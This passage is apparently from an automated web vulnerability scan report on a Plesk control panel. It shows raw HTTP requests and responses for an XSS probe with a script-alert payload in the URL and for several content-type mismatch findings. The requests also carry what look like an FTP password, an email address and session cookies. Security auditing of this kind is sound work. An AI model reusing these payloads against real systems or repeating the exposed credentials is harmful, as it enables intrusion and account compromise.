       <script language="javascript" type="text/javascript" src="/javascript/prototype.js?plesk_version=psa-10.2.0-20110407.20"></script>
       <script>
           var opt_no_frames = false;
           var opt_integrated_mode = false;
       </script>
       
       </head><body onLoad=";top.location='/login.php3';"></body><noscript>You will be redirected to the new address in 15 seconds... If you are not automatically taken to the new location, please enable javascript or click the hyperlink <a href="/login.php3" target="top">/login.php3</a>.</noscript></html><!--______________________________________________________________________________________________________________________________________________________________________________________________________________________________________________IE error page size limitation______________________________________________________________________________________________________________________________________________________________________________________________________________________________________________-->

12.16. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/web/view/id/1/%3Cscript%3Ealert(1)%3C/script%3E

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /smb/web/view/id/1/%3Cscript%3Ealert(1)%3C/script%3E

Request

GET /smb/web/view/id/1/%3Cscript%3Ealert(1)%3C/script%3E?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 19:36:58 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: PLESKSESSID=08ef70ae21325bdf1d3e7d74b0164348; path=/
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 19:36:57 GMT
Connection: close
Content-Length: 1269


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-20110407.20"/></script>
       <script language="javascript" type="text/javascript" src="/javascript/prototype.js?plesk_version=psa-10.2.0-20110407.20"></script>
       <script>
           var opt_no_frames = false;
           var opt_integrated_mode = false;
       </script>
       
       </head><body onLoad=";top.location='/login.php3';"></body><noscript>You will be redirected to the new address in 15 seconds... If you are not automatically taken to the new location, please enable javascript or click the hyperlink <a href="/login.php3" target="top">/login.php3</a>.</noscript></html><!--______________________________________________________________________________________________________________________________________________________________________________________________________________________________________________IE error page size limitation______________________________________________________________________________________________________________________________________________________________________________________________________________________________________________-->

13. Content type incorrectly stated
There are 7 instances of this issue:

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.


13.1. http://vulnerable.plesk.control.panel.20110407.20:8880/javascript/chk.js.php

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.nosedivesailing.com:8880
Path:   /javascript/chk.js.php

Issue detail

The response contains the following Content-type statement: Content-Type: text/html. The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /javascript/chk.js.php?1302230642 HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&file=/httpdocs
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PLESKSESSID=17161f28b87a6960fb097d11330c9c53; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 200 OK
Content-Type: text/html
ETag: "1306174954-17161f28b87a6960fb097d11330c9c53-en-US"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 18:22:34 GMT
Connection: close
Content-Length: 8894

function chk_quotes(str)
{
   re = /(\'.*\")|(\".*\')/;
   return str.search(re) == -1;
}


function chk_pd_name(dir)
{
   re = /^[0-9a-zA-Z\-_.\/~@!\+=\^\(\)\[\]\{\}, ]+$/;
   // forbid // and ^. and /. and .$ and ./
   re1 = /(\/\/|^\.|\.$|\/\.|\.\/|\/ | \/)/;
   return (dir.search(re) != -1) && (dir.search(re1) == -1);
}

function chk_db_name(db)
{
   re = /^[a-zA-Z0-9]{1}[A-Za-z0-9-_]{0,63}$/;
   return db.search(re) != -1;
}

function chk_db_usr_name(usr, type)
{
   if (type == 'mssql')
       re = /^[a-zA-Z]{1}[A-Za-z0-9_\-]{0,127}$/;
   else
       re = /^[a-zA-Z]{1}[A-Za-z0-9_\-]{0,15}$/;
   return usr.search(re) != -1;
}

function chk_pos_int(pos_int)
{
   re = /^\s*[1-9]{1}[0-9]*\s*$/;
   return pos_int.search(re) != -1;
}

function chk_sys_login(nm)
{
   re = /^[a-zA-Z0-9]{1}[A-Za-z0-9_.-]{0,14}$/;
   return nm.search(re) != -1;
}

function chk_mn(mail_name)
{
   re = /^([A-Za-z0-9_\-])+((\.){1}([A-Za-z0-9_\-])+)*$/;
   return mail_name.search(re) != -1;
}

function chk_resp_name(resp_name)
{
   return ((resp_name.length > 0) && (resp_name.length <= 245));
}

function chk_login(login)
{
   re = /^[a-zA-Z0-9]{1}[A-Za-z0-9_.-]{0,254}$/;
   return login.search(re) != -1;
}

function chk_realm(realm)
{
   re = /^[^\"]*$/;
   return realm.search(re) != -1;
}

function chk_dom(dom_name)
{
   if ('' == dom_name)
       return false; // check empty value

   if ('localhost.rev' == dom_name)
       return false;

   inaddr = /\.in-addr.arpa$/;
   if (dom_name.search(inaddr) != -1)
       return false;

   if (chk_ip(dom_name))    // no domain name like IP address
       return false;

   dotd = /\.d$/;
   if (dom_name.search(dotd) != -1)
       return false;

   return true; // IDN support
   /*
   nore = /\.$/;
   re = /^[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9]){0,1}(\.[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9]){0,1}){1,}$/;

   return (dom_name.search(nore) == -1) && dom_name.match(re);
   */
}

function chk_subdom(dom_name)
{
   return true; // IDN support
   /*
   re = /^[A-Za-z0-9]([A-Za-z0-9-]*[A-Za-z0-9])*$/;
   return dom_name.search(re) != -1;
   */
}

function chk_email(email)
{
   re = /^([^\@]+){1}\@([^\@]+){1}$/;
   found = email.match(re);
   if (!found)
       return false;
   return chk_mn(found[1]) && chk_dom(found[2]);
}

function chk_url(url)
{
   re = /^((http[s]?|ftp):\/\/)?([^\/:]+)(:\d{1,5})?(\/[^\s\"\'`]*)?$/i;
   found = re.exec(url);
   if (!found)
       return false;

   return chk_dom(found[3]);
}

function chk_ip(ip)
{
   return chk_ip_address_and_mask(ip, 4, 8);
}

function chk_dom_t(hst)
{
re = /^((<domain>|[A-Za-z0-9]([A-Za-z0-9-]*[A-Za-z0-9])*)(\.[A-Za-z0-9]([A-Za-z0-9-]*[A-Za-z0-9])*|\.<domain>)+|<domain>)$/;
return hst.match(re);
}

function chk_ip_t(ip)
{
   re = /^<ip>$/;
   return chk_ip(ip) || ip.match(re);
}

function chk_mask(mask)
{
   re = /^(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})$/;
   found = mask.match(re);
   if (!found)
       return false;
   var i = found.length - 1;
   while (i && (found[i] == 0)) i--;
   if (!i)
       return true;
   if (
       (found[i] != 128) &&
       (found[i] != 192) &&
       (found[i] != 224) &&
       (found[i] != 240) &&
       (found[i] != 248) &&
       (found[i] != 252) &&
       (found[i] != 254) &&
       (found[i] != 255)
   )
       return false;
   i--;
   while (i && (found[i] == 255)) i--;

   return i == 0;
}

function ip2long(str)
{
   var num = 0;
   var re = /^(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})$/;

   found = str.match(re);
   if (!found)
       return null;
   for (var i = 0; ++i < found.length; ) {
       num <<= 8;
       num |= found[i];
   }
   return num;
}

// convert ip block mask to int32 mask
function block_to_num(block)
{
   num = 0;
   for (var i = 0; i < 32; i++) {
       num <<= 1;
       num |= (block > i ? 1 : 0);
   }
   return num;
}

// check ip address and mask by valid rules
function chk_ip_address_and_mask(ip, valid, valid_formats)
{
   var ip_address_mask_format = /^(\d{1,3})(\.(\d{1,3})(\.(\d{1,3})(\.\*|)|\.\*\.\*|\.\*|)|\.\*\.\*\.\*|\.\*\.\*|\.\*|)()$/;
   var ip_address_block_format = /^(\d{1,3})(\.(\d{1,3})(\.(\d{1,3})(\.(\d{1,3})|)|)|)\/(\d{1,2})$/;
   var ip_address_netmask_format = /^(\d{1,3})(\.(\d{1,3})(\.(\d{1,3})(\.(\d{1,3})|)|)|)\/(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})$/;
   var ip_address_format = /^(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})$/;

   if (!valid)
       valid = 7;
   if (!valid_formats)
       valid_formats = 15;

   var found;
   var ip_address = null;
   var ip_mask = null;

   if (
       (valid_formats & 1) &&
       (found = ip.match(ip_address_mask_format)) &&
       (!found[1] || (found[1] >= 0 && found[1] <= 255)) &&
       (!found[3] || (found[3] >= 0 && found[3] <= 255)) &&
       (!found[5] || (found[5] >= 0 && found[5] <= 255)) &&
       (!found[7] || (found[7] >= 0 && found[7] <= 255))
   ) {
       ip_address = ip2long((found[1] ? found[1] : 0) + '.' + (found[3] ? found[3] : 0) + '.' + (found[5] ? found[5] : 0) + '.' + (found[7] ? found[7] : 0));
       ip_mask = ip2long((found[1] ? 255 : 0) + '.' + (found[3] ? 255 : 0) + '.' + (found[5] ? 255 : 0) + '.' + (found[7] ? 255 : 0));
   } else if (
       (valid_formats & 2) &&
       (found = ip.match(ip_address_block_format)) &&
       (!found[1] || (found[1] >= 0 && found[1] <= 255)) &&
       (!found[3] || (found[3] >= 0 && found[3] <= 255)) &&
       (!found[5] || (found[5] >= 0 && found[5] <= 255)) &&
       (!found[7] || (found[7] >= 0 && found[7] <= 255)) &&
       (found[8] >= 0 && found[8] <= 32)
   ) {
       ip_address = ip2long((found[1] ? found[1] : 0) + '.' + (found[3] ? found[3] : 0) + '.' + (found[5] ? found[5] : 0) + '.' + (found[7] ? found[7] : 0));
       ip_mask = block_to_num(found[8]);
   } else if (
       (valid_formats & 4) &&
       (found = ip.match(ip_address_netmask_format)) &&
       (!found[1] || (found[1] >= 0 && found[1] <= 223)) &&
       (!found[3] || (found[3] >= 0 && found[3] <= 255)) &&
       (!found[5] || (found[5] >= 0 && found[5] <= 255)) &&
       (!found[7] || (found[7] >= 0 && found[7] <= 255)) &&
       (found[8] >= 0 && found[8] <= 255) &&
       (found[9] >= 0 && found[9] <= 255) &&
       (found[10] >= 0 && found[10] <= 255) &&
       (found[11] >= 0 && found[11] <= 255)
   ) {
       ip_address = ip2long((found[1] ? found[1] : 0) + '.' + (found[3] ? found[3] : 0) + '.' + (found[5] ? found[5] : 0) + '.' + (found[7] ? found[7] : 0));
       ip_mask = ip2long(found[8] + '.' + found[9] + '.' + found[10] + '.' + found[11]);
   } else if (
       (valid_formats & 8) &&
       (found = ip.match(ip_address_format)) &&
       (found[1] >= 0 && found[1] <= 255) &&
       (found[2] >= 0 && found[2] <= 255) &&
       (found[3] >= 0 && found[3] <= 255) &&
       (found[4] >= 0 && found[4] <= 255)
   ) {
       ip_address = ip2long(found[1] + '.' + found[2] + '.' + found[3] + '.' + found[4]);
       ip_mask = block_to_num(32);
   }

   if (null == ip_address || null == ip_mask)
       return false;

   return ((valid & 1) && //network block
               ((ip_address & ip_mask) == ip_address)
       ) ||
       ((valid & 2) && // ip address with netmask
           ip_address && ip_mask &&
               (
                   ((ip_address & ~ip_mask) && // and not empty lower bits
                   ~((ip_address & ~ip_mask) | ip_mask) // minimum network size 'may be removed - bcause added single addres networks by client request ...
               ) || (ip_mask == block_to_num(32))
           ) // or single ip address
       ) ||
       ((valid & 4) && //sigle ip address
           ip_address && (ip_mask == block_to_num(32)) // not empty ip address and 0xFFFFFFFF ip mask
       );
}

function chk_ip_mask(ip, mask)
{
   if (!chk_ip(ip) || !chk_mask(mask))
       return false;

   var num_ip;
   var num_mask;

   if ((num_ip = ip2long(ip)) == null)
       return false;

   if ((num_mask = ip2long(mask)) == null)
       return false;

   // check ip/mask combination for interface:
   // 1) mask not null
   // 2) host part not null (num_ip & ~num_mask)
   // 3) host part not all 1 ~((num_ip & ~num_mask) | num_mask)
   return num_mask && (((num_ip & ~num_mask) && ~((num_ip & ~num_mask) | num_mask)) || (mask == '255.255.255.255'));
}

function chk_net_mask(net, mask)
{
   if (!chk_ip(net) || !chk_mask(mask))
       return false;

   var num_net;
   var num_mask;

   if ((num_net = ip2long(net)) == null)
       return false;

   if ((num_mask = ip2long(mask)) == null)
       return false;

   return num_mask && (num_net & num_mask) && ((num_net & num_mask) == num_net);
}

function chk_sys_passwd(username, passwd)
{
   if ((passwd.length < 4) || (passwd.length > 255))
       return false;

   if (passwd.length >= username.length) {
       if (passwd.indexOf(username, 0) != -1)
           return false;
   }

   if ((passwd.indexOf('\'') != -1) || (passwd.indexOf(' ') != -1))
       return false;

   for (var i = passwd.length; i-- > 0;) {
       if (passwd.charCodeAt(i) > 127)
           return false;
   }

   return true;
}

function chk_filename(filename)
{
   re = /^[^\']*$/;
   return filename.search(re) != -1;

}

function chk_uint(uint)
{
   re = /^[0-9]+$/;
   found = uint.match(re);
   if (!found) {
       return false;
   }

   return true;
}

13.2. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/hosting/file-manager/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.nosedivesailing.com:8880
Path:   /plesk/client@2/domain@1/hosting/file-manager/

Issue detail

The response contains the following Content-type statement: Content-Type: text/plain; charset=utf-8. The response states that it contains plain text. However, it actually appears to contain CSS.

Request

GET /plesk/client@2/domain@1/hosting/file-manager/ HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PLESKSESSID=d8ef408a62e3c0d46c9effc4a0828d66; no_frames_root_page=deleted; locale=en-US; no_frames_logout_page=deleted; psaContext=dashboard; no_frames=deleted; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; certificateslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; no_frames_login_page=deleted;

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/plain; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 19:09:05 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 19:09:05 GMT
Connection: close
Content-Length: 558

ERROR: PleskException
FileList::init() failed: ls_files_wrapper() failed: Unable to connect to pipe \\.\pipe\PSA_pipe {110D2F0F-F073-4021-AB73-C7886FB9BD1E}

Additionally, an exception has occurred while trying to report this error: PleskBadURIException
Invalid URI:

0: FileManagerUIPointer.php:726
   FileManagerUIPointer->accessItem(string 'GET', NULL null)
1: client.domain.hosting.file-manager.php:87
   plesk__client__domain__hosting__file_manager->accessItem(string 'GET', NULL null)
2: UIPointer.php:600
   UIPointer->access(string 'GET')
3: plesk.php:47

13.3. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/admin-home/disable-featured-applications-promo

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.nosedivesailing.com:8880
Path:   /smb/admin-home/disable-featured-applications-promo

Issue detail

The response contains the following Content-type statement: Content-Type: application/json. The response states that it contains JSON. However, it actually appears to contain plain text.

Request

GET /smb/admin-home/disable-featured-applications-promo HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PLESKSESSID=17161f28b87a6960fb097d11330c9c53; no_frames_root_page=deleted; locale=en-US; no_frames_logout_page=deleted; no_frames=deleted; no_frames_login_page=deleted;

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: application/json
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 18:22:35 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 18:22:34 GMT
Connection: close
Content-Length: 2

[]

13.4. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/admin-home/featured-applications/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.nosedivesailing.com:8880
Path:   /smb/admin-home/featured-applications/

Issue detail

The response contains the following Content-type statement: Content-Type: text/html. The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /smb/admin-home/featured-applications/ HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/smb/admin-home
X-Prototype-Version: 1.6.1_rc3
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PLESKSESSID=17161f28b87a6960fb097d11330c9c53; locale=en-US

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 18:59:07 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 18:59:06 GMT
Connection: close
Content-Length: 156

ERROR: PleskFatalException
wrong id

0: UserClient.php:23
   UserClient->__construct(NULL null)
1: class.Session.php:227
   Session->getUser()
2: auth.php3:296

13.5. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/app/categories-data/catalogId/apscatalog

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.nosedivesailing.com:8880
Path:   /smb/app/categories-data/catalogId/apscatalog

Issue detail

The response contains the following Content-type statement: Content-Type: text/html. The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /smb/app/categories-data/catalogId/apscatalog HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/smb/app/available/id/apscatalog
X-Prototype-Version: 1.6.1_rc3
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PLESKSESSID=66f4f3aa52eb21d7134fc0175f742f5a; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 19:24:11 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 19:24:10 GMT
Connection: close
Content-Length: 3763

<ul class="aps-category-list"> <li class="ac-web">
<div class="aps-category-block">
<h4><a href="#" onclick='apsCatalog.showCategory("Web");'>Web</a>
<span>(86)</span> </h4>
<div class="aps-category-items">
<a href="#" onclick='apsCatalog.showCategory("Web/Analytics");' >
Analytics</a>, <a href="#" onclick='apsCatalog.showCategory("Web/Blog");' >
Blog</a>, <a href="#" onclick='apsCatalog.showCategory("Web/Catalog");' >
Catalog</a>, <a href="#" onclick='apsCatalog.showCategory("Web/Content management");' >
Content management</a>, <a href="#" onclick='apsCatalog.showCategory("Web/E-commerce");' >
E-commerce</a>, <a href="#" onclick='apsCatalog.showCategory("Web/eLearning");' >
eLearning</a>, <a href="#" onclick='apsCatalog.showCategory("Web/Forum");' >
Forum</a>, <a href="#" onclick='apsCatalog.showCategory("Web/Gallery");' >
Gallery</a>, <a href="#" onclick='apsCatalog.showCategory("Web/Search");' >
Search</a>, <a href="#" onclick='apsCatalog.showCategory("Web/Tools");' >
Tools</a> </div>
</div>
</li>
<li class="ac-collaboration">
<div class="aps-category-block">
<h4><a href="#" onclick='apsCatalog.showCategory("Collaboration");'>Collaboration</a>
<span>(39)</span> </h4>
<div class="aps-category-items">
<a href="#" onclick='apsCatalog.showCategory("Collaboration/Calendaring");' >
Calendaring</a>, <a href="#" onclick='apsCatalog.showCategory("Collaboration/Chat");' >
Chat</a>, <a href="#" onclick='apsCatalog.showCategory("Collaboration/Email");' >
E-mail</a>, <a href="#" onclick='apsCatalog.showCategory("Collaboration/IP telephony");' >
IP telephony</a>, <a href="#" onclick='apsCatalog.showCategory("Collaboration/Portal");' >
Portal</a>, <a href="#" onclick='apsCatalog.showCategory("Collaboration/Project management");' >
Project management</a>, <a href="#" onclick='apsCatalog.showCategory("Collaboration/Web conferencing");' >
Web conferencing</a> </div>
</div>
</li>
<li class="ac-front-office">
<div class="aps-category-block">
<h4><a href="#" onclick='apsCatalog.showCategory("Front office");'>Front office</a>
<span>(14)</span> </h4>
<div class="aps-category-items">
<a href="#" onclick='apsCatalog.showCategory("Front office/Help Desk");' >
Help desk</a>, <a href="#" onclick='apsCatalog.showCategory("Front office/Productivity");' >
Productivity</a>, <a href="#" onclick='apsCatalog.showCategory("Front office/Survey Solutions");' >
Survey solutions</a> </div>
</div>
</li>
<li class="ac-back-office">
<div class="aps-category-block">
<h4><a href="#" onclick='apsCatalog.showCategory("Back office");'>Back office</a>
<span>(8)</span> </h4>
<div class="aps-category-items">
<a href="#" onclick='apsCatalog.showCategory("Back office/Accounting and Financial");' >
Accounting and Financial</a>, <a href="#" onclick='apsCatalog.showCategory("Back office/Asset Management");' >
Asset management</a>, <a href="#" onclick='apsCatalog.showCategory("Back office/Billing");' >
Billing</a>, <a href="#" onclick='apsCatalog.showCategory("Back office/Compliance and Risk Management");' >
Compliance and Risk Management</a>, <a href="#" onclick='apsCatalog.showCategory("Back office/Customer Relationship Management");' >
Customer relationship management</a>, <a href="#" onclick='apsCatalog.showCategory("Back office/Enterprise Resource Planning");' >
Enterprise resource planning</a>, <a href="#" onclick='apsCatalog.showCategory("Back office/Knowledge Management");' >
Knowledge management</a> </div>
</div>
</li>
</ul>

13.6. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/email-address/edit/id/2

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.nosedivesailing.com:8880
Path:   /smb/email-address/edit/id/2

Issue detail

The response contains the following Content-type statement: Content-Type: text/html. The response states that it contains HTML. However, it actually appears to contain plain text.

Request

POST /smb/email-address/edit/id/2 HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/smb/email-address/edit/id/2
Origin: http://www.nosedivesailing.com:8880
X-Prototype-Version: 1.6.1_rc3
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-type: application/x-www-form-urlencoded; charset=UTF-8
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PLESKSESSID=17161f28b87a6960fb097d11330c9c53; locale=en-US; psaContext=dashboard
Content-Length: 862

general%5BgeneralSection%5D%5Bname%5D=fdf080d9224fd0d18957a62c&general%5BgeneralSection%5D%5Bpostbox%5D=0&general%5BgeneralSection%5D%5Bpostbox%5D=1&general%5BgeneralSection%5D%5BmboxQuotaValue%5D=1047527424&general-generalSection-mboxQuotaValue-selector=specific&redirect%5BredirectSection%5D%5Benabled%5D=0&aliases%5BaliasesSection%5D%5BaliasesForm%5D%5Bc632267%5D%5BaliasName%5D=&aliases%5BaliasesSection%5D%5BaliasesForm%5D%5BdynamicSubFormTemplate%5D%5BaliasName%5D=&autoResponder%5BautoResponderSection%5D%5Benabled%5D=0&autoResponder%5BautoResponderSection%5D%5BcontentType%5D=false&autoResponder%5BautoResponderSection%5D%5BforwardAddress%5D=&autoResponder%5BautoResponderSection%5D%5Battachments%5D%5BdynamicSubFormTemplate%5D%5Bfile%5D=&antivirus%5BantivirusSection%5D%5Benabled%5D=0&hidden=&forgery_protection_token=3e86204e9517123c7f585d736d64aa3f&_=

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 18:38:02 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 18:38:01 GMT
Connection: close
Content-Length: 156

ERROR: PleskFatalException
wrong id

0: UserClient.php:23
   UserClient->__construct(NULL null)
1: class.Session.php:227
   Session->getUser()
2: auth.php3:296

13.7. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/user/edit/id/4

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.nosedivesailing.com:8880
Path:   /smb/user/edit/id/4

Issue detail

The response contains the following Content-type statement: Content-Type: text/html. The response states that it contains HTML. However, it actually appears to contain plain text.

Request

POST /smb/user/edit/id/4 HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/smb/user/edit/id/4
Origin: http://www.nosedivesailing.com:8880
X-Prototype-Version: 1.6.1_rc3
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-type: application/x-www-form-urlencoded; charset=UTF-8
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PLESKSESSID=17161f28b87a6960fb097d11330c9c53; locale=en-US; psaContext=dashboard
Content-Length: 786

general%5Bvcard%5D%5BcontactName%5D=format-1&general%5Bvcard%5D%5Bemail%5D%5BemailType%5D=internal&general%5Bvcard%5D%5Bemail%5D%5BinternalEmail%5D=fdf080d9224fd0d18957a62c&general%5Bvcard%5D%5BroleId%5D=7&general%5Baccount%5D%5Bpassword%5D=&general%5Baccount%5D%5BpasswordConfirmation%5D=&general%5Baccount%5D%5BisActive%5D=0&general%5Baccount%5D%5BisActive%5D=1&contacts%5BcontactsSection%5D%5BcompanyName%5D=1&contacts%5BcontactsSection%5D%5Bphone%5D=1&contacts%5BcontactsSection%5D%5Bfax%5D=1&contacts%5BcontactsSection%5D%5Baddress%5D=1&contacts%5BcontactsSection%5D%5Bcity%5D=1&contacts%5BcontactsSection%5D%5Bstate%5D=1&contacts%5BcontactsSection%5D%5Bzip%5D=10010&contacts%5BcontactsSection%5D%5Bcountry%5D=US&hidden=&forgery_protection_token=3e86204e9517123c7f585d736d64aa3f&_=

Response

HTTP/1.1 200 OK
